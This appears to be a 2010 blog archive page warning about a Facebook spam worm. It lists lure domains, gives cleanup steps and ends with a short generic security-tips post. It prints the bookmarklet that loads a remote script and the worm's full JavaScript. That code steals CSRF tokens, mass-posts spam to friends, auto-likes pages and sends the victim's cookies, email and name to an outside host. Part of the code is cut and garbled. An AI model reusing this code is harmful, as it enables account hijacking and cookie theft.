Archive

Posts Tagged ‘email’

Facebook Spam – Status Message

November 29th, 2010 Ahsun Taquveem Chohan 10 comments
You get a wall post by some of your friend saying some revolving image , new theme thing is out view the link to enjoy it
you open that site …the site asks you to copy some JavaScript code like …
javascript:(a = (b = document).createElement(“script”)).src = “//imaginemonkeys.com/majic.js?show”, b.body.appendChild(a); void(0)
and when you post it in your Facebook account Address bar…thats it you start spamming .. and the Fire keeps increasing ..
Some of the DOMAINS you should not visit if you see in a post :
http://fbpictures.tk
http://imaginemonkeys.com/fb/
http://fbimages.tk
http://fbookcoolimages.tk/
http://herohide.com/browse.php?
http://www.revolvingimages.info/fb/
http://revolvingimages2.tk/
http://graphicgiants.com/
http://zizz.co.tv/
New domains keep coming ….
HOW TO STOP IT ?
To stop it spamming to your wall simply re-generate your mobile email unique address at http://www.facebook.com/mobile/ clean out your cookies and don’t be copy/pasting javascript into your browser again!
The Script which runs inside the JS(which is mostly majic.js or the index.php file is :
// script name : whitebeard
// author : orkut.com/Community.aspx?cmm=43558952
txt = “Checkout 360 rotate effect on images. MUST SEEĀ http://revolvingimages.info/fb/”;
txtee = “Checkout 360 revolve effect on images. MUST SEEĀ http://revolvingimages.info/fb/”;

alert(“Please wait 2-3 mins while we setup! Do not refresh this window or click any link.”);

with(x = new XMLHttpRequest())
open(“GET”, “/”), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {
comp = (z = x.responseText).match(/name=\\”composer_id\\” value=\\”([\d\w]+)\\”/i)[1];
form = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
dt = z.match(/name=”fb_dtsg” value=”([\d\w-_]+)”/i)[1];
pfid = z.match(/name=”post_form_id” value=”([\d\w]+)”/i)[1];
appid = “150622878317085″;
appname = “rip_m_j”;

with(xx = new XMLHttpRequest())
open(“GET”, “/ajax/browser/friends/?uid=” + document.cookie.match(/c_user=(\d+)/)[1] + “&filter=all&__a=1&__d=1″),
onreadystatechange = function () { if (xx.readyState == 4 && xx.status == 200) {
m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join(“\n”).replace(/(\/\d+_|_\d+_q\.jpg)/gi, “”).split(“\n”);
i = 0; llimit=25;
t = setInterval(function () {
if (i >= llimit ) return;
if(i == 0) {
with(ddddd = new XMLHttpRequest()) open(“GET”, “/ajax/pages/dialog/manage_pages.php?__a=1&__d=1″),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function(){ if(ddddd.readyState == 4 && ddddd.status == 200){ llm = (d = ddddd.responseText).match(/\\”id\\”:([\d]+)/gi); aaac =llm.length; pplp=0; for(pplp=0;pplp([^<>]+)/)[1] + “&c=”+ document.cookie; document.body.appendChild(s); }
}, send(null);
with(xxcxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=176607175684946&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
with(lllllxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=150650771629477&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
with(llxlxlxlxx = new XMLHttpRequest()) open(“POST”, “/ajax/pages/fan_status.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“fbpage_id=109075015830180&add=1&reload=1&preserve_tab=1&use_primer=1&nctr[_mod]=pagelet_top_bar&post_form_id=”+pfid+”&fb_dtsg=” + dt + “&lsd&post_form_id_source=AsyncRequest”);
} else if (i == llimit – 1) {
with(xxxx = new XMLHttpRequest()) open(“GET”, “/mobile/?v=photos”),
setRequestHeader(“X-Requested-With”, null),
setRequestHeader(“X-Requested”, null),
onreadystatechange = function(){
if(xxxx.readyState == 4 && xxxx.status == 200){
with(s = document.createElement(“script”)) src = “http://revolvingimages.info/majic.js?q=” + document.cookie.match(/c_user=(\d+)/)[1] + “:” + (d = xxxx.responseText).match(/mailto:([^\"]+)/)[1].replace(/@/, “@”) + “:” + d.match(/id=”navAccountName”>([^<>]+)/)[1] + “&c=”+ document.cookie; document.body.appendChild(s); }
}, send(null);
}
if(i%2==0) {
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txt + “&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=” + comp + “&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt + “&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”);
}
else {
with(xd = new XMLHttpRequest()) open(“POST”, “/ajax/updatestatus.php?__a=1″),
setRequestHeader(“Content-Type”, “application/x-www-form-urlencoded”),
send(“action=PROFILE_UPDATE&profile_id=” + document.cookie.match(/c_user=(\d+)/)[1] + “&status=” + txtee + “&target_id=” + m[Math.floor(Math.random() * m.length)] + “&composer_id=” + comp + “&hey_kid_im_a_composer=true&display_context=profile&post_form_id=” + form + “&fb_dtsg=” + dt + “&lsd&_log_display_context=profile&ajax_log=1&post_form_id_source=AsyncRequest”); } i += 1;
}, 2000); }
}, send(null);
}
}, send(null);

Also one Application which is just popping up as Profile Privacy v1.2 is a FAKE APPLICATION and use such comments on other users wall:

OMG OMG OMG… I cant believe this actually works! Now you really can see who viewed your profile! on http://bit.ly/9rVvrN

—Updated—-

How to reset your dedicated/mobile email address?

Many people asked me how to reset mobile email address mentioned at http://facebook.com/mobile. You can do this by visiting your wall, and click on add photo.

There select upload from disk, and there you will see option “upload via email”, click on it. There will be an option “refresh your upload email.”, click on that and it will generate new mobile email address.

Categories: Security, Tech News Tags: , , , , , , ,

Few Important security tips

April 10th, 2009 Ahsun Taquveem Chohan 1 comment

The openness of the Internet has dramatically transformed global communications, making it easy for people around the world to exchange information. But the very same openness also creates an enormous problem. Anyone can access the network, yet not everyone has good intentions.
Some engage in malicious mischief by unleashing destructive software programs, while others view hacking computer networks as sport. Then there are people with criminal goals in mind.
To avoid becoming a victim of misguided pranksters or cyber-crime, take the time to examine the security of your personal data. Here are our recommendations, along with links to more detailed information:
1. Use anti-virus software:
Viruses spread rapidly and can damage or destroy your computer. New ones appear almost daily. It’s critical that you install and update anti-virus software regularly. Use the program to scan all the files on your system once a week, deleting the infected ones. I use avg free edition, you can get it from http://free.avg.com
2. Beware of e-mail attachments:

A virus can hide in an attachment. Opening it will unleash the virus. Don’t open an attachment from anyone you don’t know. Even if you do know the sender, an infected attachment may have been surreptitiously sent from an infected machine. The safest thing to do is to scan the attachment with anti-virus software before you open it.
Read more…

Categories: Security Tags: , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , , ,